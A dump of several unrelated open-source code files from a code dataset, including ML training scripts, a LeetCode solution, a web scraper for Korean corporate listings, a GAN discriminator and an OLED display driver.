)\n parser.add_argument(\n '--attend_to',\n type=str,\n default='abstract',\n help='field to attend to'\n )\n parser.add_argument(\n '--word_num_layers',\n type=int,\n default=1,\n help='The number of transformer decoder layers.'\n )\n parser.add_argument(\n '--word_d_model',\n type=int,\n default=768,\n help='Number of units for attention v, k, q, and final linear transforms.'\n )\n parser.add_argument(\n '--word_dff_x',\n type=int,\n default=4,\n help=\n 'Number of units for the Point wise feed forward network, normally 4X d_model.'\n )\n parser.add_argument(\n '--word_dropout_rate',\n type=float,\n default=0.1,\n help='Dropout rate for transformer embedding.'\n )\n parser.add_argument(\n '--sent_num_layers',\n type=int,\n default=1,\n help='The number of transformer decoder layers.'\n )\n parser.add_argument(\n '--sent_d_model',\n type=int,\n default=768,\n help='Number of units for attention v, k, q, and final linear transforms.'\n )\n parser.add_argument(\n '--sent_dff_x',\n type=int,\n default=4,\n help=\n 'Number of units for the Point wise feed forward network, normally 4X d_model.'\n )\n parser.add_argument(\n '--sent_dropout_rate',\n type=float,\n default=0.1,\n help='Dropout rate for transformer embedding.'\n )\n parser.add_argument(\n '--use_transformer_positional_encoding',\n type='bool',\n default='True',\n help='Add positional encoding to transformer input.'\n )\n\n parser.add_argument(\n '--sent_pool_abstract_features',\n type='bool',\n default='False',\n help='Pool abstract features with word output.'\n )\n parser.add_argument(\n '--sent_conv_bank_size',\n type=int,\n default=15,\n help='Convolution bank kernal sizes 1 to bank_size.'\n )\n parser.add_argument(\n '--sent_rnn_cell_type',\n type=str,\n choices=['LSTM', 'GRU', 'encoder', 'decoder', 'None'],\n default='LSTM',\n help='RNN Cell Type'\n )\n parser.add_argument(\n '--sent_rnn_num_units',\n type='list',\n default='[128]',\n help='Number of node per recurrent network layer.'\n )\n parser.add_argument(\n '--sent_dense_units',\n type='list',\n # default='[256,128,64]',\n default='[None]',\n help='Number of units for the dense layers.'\n )\n parser.add_argument(\n '--arti_dense_units',\n type='list',\n # default='[256,128,64]',\n default='[None]',\n help='Number of units for the dense layers.'\n )\n\n parser.add_argument(\n '--use_crf',\n type='bool',\n default='False',\n help='Calculate loss using linear chain CRF instead of Softmax.'\n )\n parser.add_argument(\n '--use_batch_renorm',\n type='bool',\n default='True',\n help='Use Batch Renormalization.'\n )\n parser.add_argument(\n '--loss_type',\n type=str,\n choices=['softmax', 'sigmoid'],\n default='sigmoid',\n help='Loss function'\n )\n parser.add_argument(\n '--scale_label',\n type=float,\n default=0.925,\n help='Scale labels to keep weights from exploding.'\n )\n parser.add_argument(\n '--loss_pos_weight',\n type=float,\n default=1.8,\n help=\n 'A value pos_weight > 1 decreases the false negative count, hence increasing the recall. Conversely setting pos_weight < 1 decreases the false positive count and increases the precision.'\n )\n parser.add_argument(\n '--article_loss_pos_weight',\n type=float,\n default=1.8,\n help=\n 'A value pos_weight > 1 decreases the false negative count, hence increasing the recall. Conversely setting pos_weight < 1 decreases the false positive count and increases the precision.'\n )\n\n parser.add_argument(\n '--clip_gradients_std_factor',\n type=float,\n default=2., # num_batches_per_epoch * num_epochs_per_decay(8)\n help=\n 'If the norm exceeds `exp(mean(log(norm)) + std_factor*std(log(norm)))` then all gradients will be rescaled such that the global norm becomes `exp(mean)`.'\n )\n parser.add_argument(\n '--clip_gradients_decay',\n type=float,\n default=0.95,\n help='The smoothing factor of the moving averages.'\n )\n parser.add_argument(\n '--clip_gradients_static_max_norm',\n type=float,\n default=6.,\n help=\n 'If provided, will threshold the norm to this value as an extra safety.'\n )\n\n parser.add_argument(\n '--no_bert_training_steps',\n type=int,\n default=224, # num_batches_per_epoch * num_epochs_per_decay(8)\n help='Decay learning_rate by decay_rate every decay_steps.'\n )\n parser.add_argument(\n '--learning_rate_decay_fn',\n type=str,\n default='exponential_decay',\n help=\n 'Learning rate decay function. One of \"none\", \"noisy_linear_cosine_decay\", \"exponential_decay\"'\n )\n parser.add_argument(\n '--learning_rate_decay_steps',\n type=int,\n default=2000, # num_batches_per_epoch * num_epochs_per_decay(8)\n help='Decay learning_rate by decay_rate every decay_steps.'\n )\n parser.add_argument(\n '--learning_rate_decay_rate',\n type=float,\n default=0.7,\n help='Learning rate decay rate.'\n )\n parser.add_argument(\n '--train_seg_embed',\n type='bool',\n default='False',\n help='Whether to train bias and seg_embed layers.'\n )\n parser.add_argument(\n '--freeze_layers',\n type=int,\n default=12, # \n help='How many pretrained layers to freeze.'\n )\n parser.add_argument(\n '--layer_decay_rate',\n type=float,\n default=1.0,\n help='Exponetially descrease the learning rate the further up the stack you go for pretrained layers. Top layer: lr[L] = FLAGS.learning_rate. Low layer: lr[l-1] = lr[l] * lr_layer_decay_rate.'\n )\n parser.add_argument(\n '--layer_warmup_steps',\n type=int,\n default=2000, # 200% epoch\n help='Learning rate warmup steps for pretrained layers.'\n )\n parser.add_argument(\n '--learning_rate',\n type=float,\n default=0.001,\n help='Learning rate used for training.'\n )\n parser.add_argument(\n '--warmup_steps',\n type=int,\n default=250, # 10% epoch\n help='Learning rate warmup steps needed to reach specified learning_rate.'\n )\n parser.add_argument(\n '--warmup_repeat_steps',\n type=int,\n default=0, # 0 to disable repeat warmup\n help='Restart warmup every this many steps.'\n )\n parser.add_argument(\n '--warmup_start_lr',\n type=float,\n default=0.001,\n help='Learning rate warmup starting multiplier value.'\n )\n parser.add_argument(\n '--warmup_schedule',\n type=str,\n default='exp',\n help='Learning rate warmup schedule. One of \"exp\", \"linear\", \"none\"'\n )\n # learning rate defaults\n # Adagrad: 0.01\n # Adam: 0.001\n # RMSProp: 0.001\n # :\n # Nadam: 0.002\n # SGD: 0.01\n # Adamax: 0.002\n # Adadelta: 1.0\n parser.add_argument(\n '--optimizer',\n type=str,\n default='bertadam',\n help=\n 'Optimizer to use. One of \"Adam\", \"bertadam\", \"adamw\", \"Momentum\", \"Adagrad\", \"Ftrl\", \"RMSProp\", \"SGD\"'\n )\n parser.add_argument(\n '--adam_epsilon',\n type=float,\n default=1e-08,\n help=\n 'A small constant for numerical stability. This epsilon is \"epsilon hat\" in the Kingma and Ba paper (in the formula just before Section 2.1), not the epsilon in Algorithm 1 of the paper.'\n )\n\n parser.add_argument(\n '--check_nans',\n type='bool',\n default='False',\n help=\n 'Add runtime checks to spot when NaNs or other symptoms of numerical errors start occurring during training.'\n )\n parser.add_argument(\n '--trace',\n type='bool',\n default='False',\n help=\n 'Captures CPU/GPU profiling information in \"timeline-<step>.json\", which are in Chrome Trace format.'\n )\n parser.add_argument(\n '--debug', type='bool', default='False', help='Run debugging ops.'\n )\n\n FLAGS, unparsed = parser.parse_known_args()\n FLAGS.command = ' '.join(sys.argv)\n tf.app.run(main=main, argv=[sys.argv[0]] + unparsed)\n","repo_name":"hotdogee/aicup2019-abstract-labeling","sub_path":"aicup1-v16.py","file_name":"aicup1-v16.py","file_ext":"py","file_size_in_byte":218627,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"44069655001","text":"def solve(s):\n li = s.split()\n\n if len(li) == 0:\n return 0\n\n s = li[0]\n sign = 1\n if s[0] == '+' or s[0] == '-':\n if s[0] == '-':\n sign = -1\n s = s[1:len(s)]\n\n result = 0\n for i in range(len(s)):\n c = s[i]\n\n try:\n num = int(s[i])\n result = 10*result + num\n if sign * result < (-2 ** 31):\n return -2 ** 31\n elif (2 ** 31 - 1) < sign * result:\n return 2 ** 31 - 1\n except ValueError:\n return sign * result\n return sign * result\n\n\nprint(solve(\"42\"))\nprint(solve(\" -42\"))\nprint(solve(\"4193 with words\"))\nprint(solve(\"words and 987\"))\nprint(solve(\"-91283472332\"))\n","repo_name":"yoshikipom/leetcode","sub_path":"algorithms/0008.py","file_name":"0008.py","file_ext":"py","file_size_in_byte":723,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"33799285958","text":"# 链表的奇偶重排\n\nclass ListNode:\n def __init__(self, x):\n self.val = x\n self.next = None\n\nclass Solution:\n def oddEvenList(self , head: ListNode) -> ListNode:\n even = ListNode(0)\n odd = ListNode(1)\n p_even = even\n p_odd = odd\n count = 1\n\n while head:\n if count % 2 == 0:\n p_even.next = head\n p_even = p_even.next\n else:\n p_odd.next = head\n p_odd = p_odd.next\n head = head.next\n count += 1\n\n p_even.next = None\n p_odd.next = even.next\n return odd.next\n\n# 双指针\nclass Solution:\n def oddEvenList(self , head: ListNode) -> ListNode:\n if not head:\n return head\n \n odd, even = head, head.next\n evenhead = even\n\n while even and even.next:\n odd.next = even.next\n odd = odd.next\n even.next = odd.next\n even = even.next\n odd.next = evenhead\n \n return head\n \n \n","repo_name":"wenshuojie/Algorithm-progress","sub_path":"剑指101/BM14.py","file_name":"BM14.py","file_ext":"py","file_size_in_byte":1078,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"38861648130","text":"import numpy as np\nimport torch\nfrom torch import nn\nfrom torch.nn import functional as F\nimport torch_geometric\n\nfrom optimal_agents.utils.loader import get_env, get_morphology\n\nfrom optimal_agents.algs.graph_rollout_buffer import obs_to_graph\nfrom optimal_agents.morphology import Morphology\n\nclass NodeMorphologyVF(nn.Module):\n\n def __init__(self, params, lr=0.001, batch_size=64, buffer_size=3072, include_segments=False, \n thompson=False):\n super().__init__()\n self.params = params\n self.buffer_size = buffer_size\n self.batch_size = batch_size\n self.thompson = thompson\n self.include_segments = include_segments\n\n if 'activation_fn' in self.params['policy_kwargs']:\n self.act_fn = vars(F)[self.params['policy_kwargs']['act_fn']]\n else:\n self.act_fn = torch.tanh\n if 'net_arch' in self.params['policy_kwargs']:\n net_arch = self.params['policy_kwargs']['net_arch']\n else:\n net_arch = [128, 128, 128]\n if 'graph_conv_class' in self.params['policy_kwargs']:\n graph_layer = vars(torch_geometric.nn)[self.params['policy_kwargs']['graph_conv_class']]\n else:\n graph_layer = torch_geometric.nn.GraphConv\n\n # Construct a test environment to get the input / output sizes\n test_morph = get_morphology(params)\n test_env = get_env(params, morphology=test_morph)\n self.morphology_graph_fn = test_env.get_morphology_obs # Make srue we have the correct conversion function.\n morphology_obs = self.morphology_graph_fn(test_morph, self.include_segments)\n \n last_layer_dim = morphology_obs['x'].shape[1] # Get the input size for each node.\n\n layers = []\n for layer in net_arch:\n layers.append(graph_layer(last_layer_dim, layer))\n last_layer_dim = layer\n self.last_extractor_dim = last_layer_dim\n self.layers = nn.ModuleList(layers)\n self.linear = torch.nn.Linear(last_layer_dim, 1)\n\n self.optim = torch.optim.Adam(self.parameters(), lr=lr)\n self.criterion = torch.nn.MSELoss()\n self.data = []\n self.test_dropout_mask = None\n\n test_env.close()\n del test_env # Force close this.\n\n def forward(self, graph, dropout_mask=None):\n x, edge_index = graph.x, graph.edge_index\n for layer in self.layers:\n x = layer(x, edge_index)\n x = self.act_fn(x)\n\n x = torch_geometric.nn.global_mean_pool(x, graph.batch) # Global pool before linear layer to support thompson dropout\n\n if self.thompson:\n if dropout_mask is None:\n dropout_mask = torch.distributions.Bernoulli(torch.full_like(x, 0.5)).sample() / 0.5\n x = x * dropout_mask\n\n x = self.linear(x)\n return x\n\n def update(self, data, n_epochs=8):\n self.test_dropout_mask = None # Set the dropout mask to None. We are no longer in the same assessment\n self.data.extend(data)\n if len(self.data) > self.buffer_size:\n num_over = len(self.data) - self.buffer_size\n del self.data[:num_over] # Remove the first num_over elements from the buffer\n\n # Normalize the data for the update.\n reward_values = [data_pt[1] for data_pt in self.data]\n reward_mean = np.mean(reward_values)\n reward_std = np.std(reward_values)\n\n for epoch in range(n_epochs):\n perm = np.random.permutation(len(self.data))\n num_full_batches = len(perm) // self.batch_size\n for i in range(num_full_batches + 1):\n if i != num_full_batches:\n inds = perm[i*self.batch_size:(i+1)*self.batch_size]\n else:\n inds = perm[i*self.batch_size:]\n if len(inds) == 0:\n continue\n y = torch.from_numpy(np.array([(self.data[ind][1] - reward_mean)/reward_std for ind in inds])).float().unsqueeze(-1)\n graph = torch_geometric.data.Batch.from_data_list([self.data[ind][0] for ind in inds])\n self.optim.zero_grad()\n values = self.forward(graph)\n assert values.shape == y.shape\n loss = self.criterion(values, y)\n loss.backward()\n self.optim.step()\n\n # Test Loss\n with torch.no_grad():\n print(len(self.data), \"DATA PTS\")\n graph = torch_geometric.data.Batch.from_data_list([self.data[ind][0] for ind in range(len(self.data))])\n y = torch.from_numpy(np.array([(self.data[i][1] - reward_mean)/reward_std for i in range(len(self.data))])).float()\n test_loss = self.criterion(self.forward(graph), y.unsqueeze(-1)).item()\n return test_loss\n \n def evaluate(self, morphology):\n if self.thompson and self.test_dropout_mask is None:\n self.test_dropout_mask = (torch.distributions.Bernoulli(\n torch.full((1, self.last_extractor_dim), 0.5)\n ).sample() / 0.5)\n graph = self.morphology_graph_fn(morphology, include_segments=self.include_segments)\n graph = torch_geometric.data.Batch.from_data_list(obs_to_graph([graph]))\n with torch.no_grad():\n value = self.forward(graph, dropout_mask=self.test_dropout_mask)[0]\n return value\n","repo_name":"jhejna/morphology-opt","sub_path":"optimal_agents/policies/pruning_models.py","file_name":"pruning_models.py","file_ext":"py","file_size_in_byte":5435,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"40"} +{"seq_id":"5520074602","text":"import utils\nimport constant\nimport numpy as np\nfrom aiohttp import web\nimport socketio\nimport os\n\nsio = socketio.AsyncServer(async_mode='aiohttp')\napp = web.Application()\nsio.attach(app)\n\n@sio.on('timeElapsed', namespace='/home')\nasync def timeElapsed():\n \"\"\"Example of how to send server generated events to clients.\"\"\"\n second = 0\n minute = 0\n hour = 0\n while True:\n await sio.sleep(1)\n second += 1\n if second == 60:\n second = 0\n minute += 1\n if minute == 60:\n minute = 0\n hour += 1\n await sio.emit('timeElapsed', {'data': '%s : %s : %s' % (hour, minute, second)}, namespace='/home')\n\n@sio.on('predictAndRecommend', namespace='/home')\nasync def predictAndRecommend(sid, mark):\n # print(mark)\n markDict = utils.predictMark(mark)\n # print(markDict)\n await sio.emit('markResult', markDict, room=sid, namespace='/home')\n subjectCombinationMark = utils.calculateSubjectCombinationMark(markDict)\n # print(subjectCombinationMark)\n await sio.emit('markPerGradeResult', subjectCombinationMark, room=sid, namespace='/home')\n listUniversities = utils.findUniversities(subjectCombinationMark)\n await sio.emit('universitiesResult', listUniversities, room=sid, namespace='/home')\n # for university in listUniversities:\n # print(university)\n\nasync def mainPage(request):\n with open(constant.MAINPAGE_HTML, encoding='utf8') as f:\n return web.Response(text=f.read(), content_type='text/html')\n\n@sio.on('connect', namespace='/home')\nasync def connect(sid, environ):\n print('Client Connected: ' +str(sid))\n\n@sio.on('disconnect', namespace='/home')\ndef disconnect(sid):\n print('Client Disconnected: ' + str(sid))\n\napp.router.add_static('/static', constant.WEB_DIR + 'static')\napp.router.add_get('/', mainPage)\n\nif __name__ == '__main__':\n #http://0.0.0.0:8080/result?subCom=nature&math0=0&math1=0&math2=0&literature0=0&literature1=0&literature2=0&english0=0&english1=0&english2=0&physics0=0&physics1=0&physics2=0&chemistry0=0&chemistry1=0&chemistry2=0&biology0=0&biology1=0&biology2=0&history0=0&history1=0&history2=0&geography0=0&geography1=0&geography2=0&civiceducation0=0&civiceducation1=0&civiceducation2=0\n sio.start_background_task(timeElapsed)\n web.run_app(app)\n","repo_name":"martinakaduc/mpurs-v2.0","sub_path":"code/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2320,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"33041001852","text":"import manga109api\nfrom PIL import Image, ImageDraw\n\ndef draw_rectangle(img, x0, y0, x1, y1, annotation_type):\n assert annotation_type in [\"body\", \"face\", \"frame\", \"text\"]\n color = {\"body\": \"#258039\", \"face\": \"#f5be41\",\n \"frame\": \"#31a9b8\", \"text\": \"#cf3721\"}[annotation_type]\n draw = ImageDraw.Draw(img)\n draw.rectangle([x0, y0, x1, y1], outline=color, width=10)\n\nif __name__ == \"__main__\":\n manga109_root_dir = \"../Manga109s_released_2021_12_30\"\n book = \"ARMS\"\n page_index = 6\n\n p = manga109api.Parser(root_dir=manga109_root_dir)\n annotation = p.get_annotation(book=book)\n img = Image.open(p.img_path(book=book, index=page_index))\n\n # for annotation_type in [\"body\", \"face\", \"frame\", \"text\"]:\n for annotation_type in [\"text\"]:\n rois = annotation[\"page\"][page_index][annotation_type]\n for roi in rois:\n draw_rectangle(img, roi[\"@xmin\"], roi[\"@ymin\"], roi[\"@xmax\"], roi[\"@ymax\"], annotation_type)\n\n img.save(\"out.jpg\")","repo_name":"eddie0509tw/Dbnet","sub_path":"manga_preprocess/demo.py","file_name":"demo.py","file_ext":"py","file_size_in_byte":994,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"34591649668","text":"import random\nfrom pathlib import Path\n\nfrom analytics.utils import loading_json, writing_json\n\ndef data_model(modelout, refdata, rndseed=816223):\n mt = loading_json(modelout)\n mt_id = {it['id']:it for it in mt}\n rf = loading_json(refdata)\n rf_id = {it['id']:it for it in rf}\n id = sorted(list(set(mt_id)), key=lambda id:int(id.split('.')[-1]))\n out_items = []\n for i in id:\n itm = {'id':i}\n itm['word'] = rf_id[i]['word']\n itm['gloss-ref']=rf_id[i]['gloss']\n itm['gloss-out']=mt_id[i]['gloss']\n itm['example']=rf_id[i]['example']\n out_items.append(itm)\n file_over = Path(modelout).with_suffix('.refalign.json')\n writing_json(file_over, out_items)\n random.seed(rndseed)\n random.shuffle(out_items)\n file_over = Path(modelout).with_suffix('.refalign.rndshuff.json')\n writing_json(file_over, out_items)\n\nif __name__ == '__main__':\n data_model('/home/olygina/project/semeval2022/submission/defmod/defmod.en.sgns.json',\n '/home/olygina/codwoe/reference_data/en.test.defmod.complete.json')\n","repo_name":"drgere/diploma","sub_path":"analytics/defmod/aligning.py","file_name":"aligning.py","file_ext":"py","file_size_in_byte":1082,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"24972433002","text":"import pandas as pd\nimport requests\nimport time\nimport sys\nimport re\n\nfrom urllib.request import urlopen\nfrom bs4 import BeautifulSoup\nfrom databases import maria\n\n\ndef printProgress(iteration, total, prefix='', suffix='', decimals=1, barLength=100):\n formatStr = \"{0:.\" + str(decimals) + \"f}\"\n percent = formatStr.format(100 * (iteration / float(total)))\n filledLength = int(round(barLength * iteration / float(total)))\n bar = '#' * filledLength + '-' * (barLength - filledLength)\n sys.stdout.write('\\r%s |%s| %s%s %s' % (prefix, bar, percent, '%', suffix)),\n if iteration == total:\n sys.stdout.write('\\n')\n sys.stdout.flush()\n\n\nurl = 'http://dart.fss.or.kr/corp/searchCorpL.ax'\n\nfor i in range(8, 218):\n printProgress(i, 217, '# Progress :', 'processing page %s of 217.' % i, 2, 50)\n\n params = {'currentPage': '%s' % i}\n\n # corporationType: P(유가증권, KOSPI), A(KOSDAQ), N(KONEX), E(기타법인)\n response = requests.post(url, params=params)\n soup = BeautifulSoup(response.content, 'lxml')\n trs = soup.find_all('tr')\n\n data = []\n is_first = True\n\n for a in trs:\n if is_first:\n is_first = False\n continue\n\n corp_code = a.find('input', {'name': 'hiddenCikCD1'}).get('value')\n corp_name = a.find('input', {'name': 'hiddenCikNM1'}).get('value')\n market_type = a.find('img').get('alt')\n\n tr_string = re.sub('[\\t\\r\\n\\v\\f]|\\'|\\\"', '', str(a))\n symb_code = re.findall('<td style=padding:0 2px;text-align:center;>([A-Z0-9]{6})</td>', tr_string)\n corp_type_name = re.findall('종 :([\\w.가-힣 ,;]*)>', tr_string)\n corp_name_both = re.findall('회  사  명 :(.*)영  문  명 :(.*)대표자', tr_string)\n\n data.append([corp_code,\n corp_name,\n corp_name_both[0][1] if len(corp_name_both) and len(corp_name_both[0]) > 1 else '',\n corp_type_name[0] if len(corp_type_name) else '',\n 'E' if market_type == '기타법인' else (\n 'I' if market_type == '유가증권시장' else (\n 'Q' if market_type == '코스닥시장' else (\n 'X' if market_type == '코넥스시장' else ''))),\n symb_code[0] if len(symb_code) else ''])\n\n ## End for loop, for a in trs:\n\n df_corpinfo = pd.DataFrame(data, columns=['corp_code',\n 'corp_name',\n 'corp_name_en',\n 'corp_type_name',\n 'market_type_code',\n 'symb_code'])\n mariadb = maria()\n mariadb.insert(\"dart_corp_info\", df_corpinfo)\n\n print('\\n# Progress : %s the corporation & symbol informations are stored successfully.' % '{:,}'.format(\n len(df_corpinfo)))\n\n time.sleep(0.15)\n\n## End for loop, for i in range(1, 218):\n\nprint(df_corpinfo.head())\n\n\n","repo_name":"PeterDeSOM/innostock","sub_path":"crawl/dart.init.corpinfo.py","file_name":"dart.init.corpinfo.py","file_ext":"py","file_size_in_byte":3058,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"19306496698","text":"from kivy.uix.button import Button\r\n\r\nfrom mdata.drivers.config.config_management import ConfigManagement\r\n\r\n\r\nclass SaveButton(Button):\r\n def __init__(self, base, **kwargs):\r\n self.base = base\r\n self.text = 'Save'\r\n self.size_hint = (0.2, 0.1)\r\n self.inputs = kwargs['inputs']\r\n self.incorrect_inputs = list()\r\n self.exceptions = ['company_list']\r\n super(SaveButton, self).__init__(**kwargs)\r\n\r\n def on_press(self):\r\n self.base.hide_save_labels()\r\n data = {name: value.get_text() for (name, value)\r\n in self.inputs.iteritems()\r\n if name not in self.exceptions}\r\n config = ConfigManagement()\r\n try:\r\n self.validate_inputs()\r\n config.set_data(data)\r\n self.base.add_widget(self.base.labels['saved'])\r\n except ValueError:\r\n wrong_labels = [self.base.labels[label].text\r\n for label in self.incorrect_inputs]\r\n error = 'Error during saving configuration.\\n' \\\r\n 'Wrong content: {box}'\\\r\n .format(box=' '.join(wrong_labels))\r\n self.base.labels['not_saved_custom'].text = error\r\n self.base.add_widget(self.base.labels['not_saved_custom'])\r\n except Exception as e:\r\n print(e)\r\n self.base.add_widget(self.base.labels['not_saved'])\r\n\r\n def validate_inputs(self):\r\n self.incorrect_inputs = list()\r\n for name, content in self.inputs.iteritems():\r\n if not content.validate:\r\n self.incorrect_inputs.append(name)\r\n if self.incorrect_inputs:\r\n raise ValueError\r\n","repo_name":"LukasPolon/MData","sub_path":"mDataAn/mdata/gui/buttons/save_button.py","file_name":"save_button.py","file_ext":"py","file_size_in_byte":1699,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"3107257513","text":"#coding=utf-8\nimport numpy as np\nimport tensorflow as tf\n\nfrom ops import *\nfrom tensorflow.layers import batch_normalization\n\nclass Discriminator:\n def __init__(self,img_shape):\n _,_,channels = img_shape\n # 初始化权重和偏移值\n # 定义 Variable Scope(变量作用域),便于区分生成器和判别器\n layer_sizes = [64,64,128,256]\n with tf.variable_scope('d'):\n print(\"初始化判别器权重\")\n\n self.W1 = init_weights([5,5,channels,layer_sizes[0]])\n self.b1 = init_bias([layer_sizes[0]])\n\n self.W2 = init_weights([3,3,layer_sizes[0],layer_sizes[1]])\n self.b2 = init_bias([layer_sizes[1]])\n \n self.W3 = init_weights([5,5,layer_sizes[1],layer_sizes[2]])\n self.b3 = init_bias([layer_sizes[2]])\n \n self.W4 = init_weights([5,5,layer_sizes[2],layer_sizes[3]])\n self.b4 = init_bias([layer_sizes[3]])\n \n self.W5 = init_weights([5,5, 7*7*layer_sizes[3],1])\n self.b5 = init_bias([1])\n\n def forword(self,X,momentum=0.5):\n # 创建前向传播\n # 4 个卷积层而且没有使用池化层,通过在卷积层上使用步长为 2 来达到全连接层的效果(减小图片尺寸)\n # 1 个全连接层\n\n # 定义第一层\n # 步长形状为 [batch,height,width,channels]\n z = conv2d(X, self.W1, [1, 2, 2, 1], padding=\"SAME\") # 14x14x64\n # 定义偏移值\n z = tf.nn.bias_add(z, self.b1)\n # 激活函数 这里使用 leak\n z = tf.nn.leaky_relu(z)\n \n # 定义第二层\n z = conv2d(z, self.W2, [1, 1, 1, 1], padding=\"SAME\") # 14x14x64\n z = tf.nn.bias_add(z, self.b2)\n # 归一化冲量为 0.5 \n z = batch_normalization(z, momentum=momentum)\n z = tf.nn.leaky_relu(z)\n\n # 定义第三层\n z = conv2d(z, self.W3, [1, 2, 2, 1], padding=\"SAME\") # 7x7x128\n z = tf.nn.bias_add(z, self.b3)\n z = batch_normalization(z, momentum=momentum)\n z = tf.nn.leaky_relu(z)\n\n z = conv2d(z, self.W4, [1, 1, 1, 1], padding=\"SAME\") # 7x7x256\n z = tf.nn.bias_add(z, self.b4)\n z = batch_normalization(z, momentum=momentum)\n z = tf.nn.leaky_relu(z)\n\n # 全连接层\n # 通过 flatten image\n z = tf.reshape(z, [-1, 7*7*256])\n logits = tf.matmul(z, self.W5)\n logits = tf.nn.bias_add(logits, self.b5)\n return logits","repo_name":"zideajang/tf_tut","sub_path":"ch9/discriminator.py","file_name":"discriminator.py","file_ext":"py","file_size_in_byte":2509,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"40917881531","text":"import framebuf\nimport time\n\n\n_SET_PAGE_ADDRESS = const(0xB0)\n_DISPLAY_OFF = const(0xAE)\n_DISPLAY_ON = const(0xAF)\n_LOW_COLUMN_ADDRESS = const(0x00)\n_HIGH_COLUMN_ADDRESS = const(0x10)\n_START_LINE_ADDRESS = const(0x40)\n_SET_CONTRAST_CTRL_REG = const(0x81)\n_SET_NORMAL_DISPLAY = const(0xA6) # normal/inverse\n\n\nclass SH1106:\n width = 128\n height = 64\n\n def __init__(self, spi, dc, rst, cs):\n self.spi = spi\n self.cs = cs\n self.dc = dc\n self.rst = rst\n self.cs.init(self.cs.OUT, value=1)\n self.dc.init(self.dc.OUT, value=0)\n self.rst.init(self.rst.OUT, value=1)\n self._buffer = bytearray(self.height // 8 * self.width)\n self._framebuf = framebuf.FrameBuffer1(\n self._buffer, self.width, self.height)\n self.reset()\n\n def reset(self):\n self.rst.low()\n time.sleep_ms(50)\n self.rst.high()\n time.sleep_ms(50)\n\n def _data(self, data):\n self.dc.high()\n self.cs.low()\n self.spi.write(data)\n self.cs.high()\n\n def _write(self, command, data=None):\n self.dc.low()\n self.cs.low()\n self.spi.write(bytearray([command]))\n self.cs.high()\n if data:\n self._data(data)\n\n def vscroll(self, dy):\n self._write(_START_LINE_ADDRESS | dy & 0x3f)\n\n def inverse(self, value):\n self._write(_SET_NORMAL_DISPLAY | bool(value))\n\n def contrast(self, value):\n self._write(_SET_CONTRAST_CTRL_REG, bytearray([value]))\n\n def sleep(self, value):\n self._write(_DISPLAY_OFF | (not value))\n\n def fill(self, col):\n self._framebuf.fill(col)\n\n def pixel(self, x, y, col):\n self._framebuf.pixel(x, y, col)\n\n def scroll(self, dx, dy):\n self._framebuf.scroll(dx, dy)\n\n def text(self, string, x, y, col=1):\n self._framebuf.text(string, x, y, col)\n\n def show(self):\n for page in range(self.height // 8):\n self._write(_SET_PAGE_ADDRESS | page)\n self._write(_LOW_COLUMN_ADDRESS | 2)\n self._write(_HIGH_COLUMN_ADDRESS | 0)\n self._data(self._buffer[\n self.width * page:self.width * page + self.width\n ])\n","repo_name":"mcauser/deshipu-micropython-ili9341","sub_path":"sh1106.py","file_name":"sh1106.py","file_ext":"py","file_size_in_byte":2209,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"73739271160","text":"#!/usr/bin/env python3\n\nfrom sklearn.model_selection import GroupKFold, cross_val_score\nfrom xgboost import XGBClassifier\nimport polars as pl\nimport pandas as pd\nimport numpy as np\nfrom joblib import dump, load\nimport argparse\nimport logging\nimport os\n\nfrom sklearn.metrics import accuracy_score\nfrom sklearn.ensemble import RandomForestClassifier,GradientBoostingClassifier,AdaBoostClassifier,ExtraTreesClassifier\nfrom sklearn.preprocessing import StandardScaler,MaxAbsScaler\nfrom sklearn.naive_bayes import GaussianNB\nfrom sklearn.linear_model import LogisticRegression,Perceptron\nfrom sklearn.discriminant_analysis import QuadraticDiscriminantAnalysis\nfrom sklearn.pipeline import make_pipeline\n\nif __name__ == '__main__':\n parent_parser = argparse.ArgumentParser(add_help=False)\n parent_parser.add_argument('--debug', help='output debug information', action=\"store_true\")\n #parent_parser.add_argument('--version', help='output version information and quit', action='version', version=repeatm.__version__)\n parent_parser.add_argument('--quiet', help='only output errors', action=\"store_true\")\n\n # ./12_apply_model.py --model the.model -x the.x --training-data-header <(head the.training-data-header)\n parent_parser.add_argument('--models', nargs='+', help='models to use', required=True)\n parent_parser.add_argument('-x', help='table of inputs to use', required=True)\n parent_parser.add_argument('--training-data-header', help='header of training data', required=True)\n parent_parser.add_argument('--output-predictions', help='output predictions', required=True)\n args = parent_parser.parse_args()\n\n # Setup logging\n if args.debug:\n loglevel = logging.DEBUG\n elif args.quiet:\n loglevel = logging.ERROR\n else:\n loglevel = logging.INFO\n logging.basicConfig(level=loglevel, format='%(asctime)s %(levelname)s: %(message)s', datefmt='%d/%m/%Y %I:%M:%S %p')\n\n\n # Read in data\n # d = pl.read_csv('TableAncestralRoot1.tsv',sep=\"\\t\")\n d = pd.read_csv(args.x, sep=\"\\t\")\n logging.info(\"Read in input data of shape {}\".format(d.shape))\n\n # Collapse counts of each COG subfamily\n d2 = d\n d2['COG'] = d2['COG'].str.split('_').str[0]\n d3 = d2.groupby('COG').sum()\n d4 = d3.transpose()\n\n # Read training data header\n eg_data = pl.read_csv(args.training_data_header, separator=\"\\t\", has_header=True)\n header = eg_data.select(pl.exclude([\n 'accession','false_negative_rate','false_positive_rate'\n ])).columns\n # Blacklist these as they aren't in the current ancestral file, not sure why\n header = list([h for h in header if h not in ['COG0411', 'COG0459', 'COG0564', 'COG1344', 'COG4177']])\n \n # 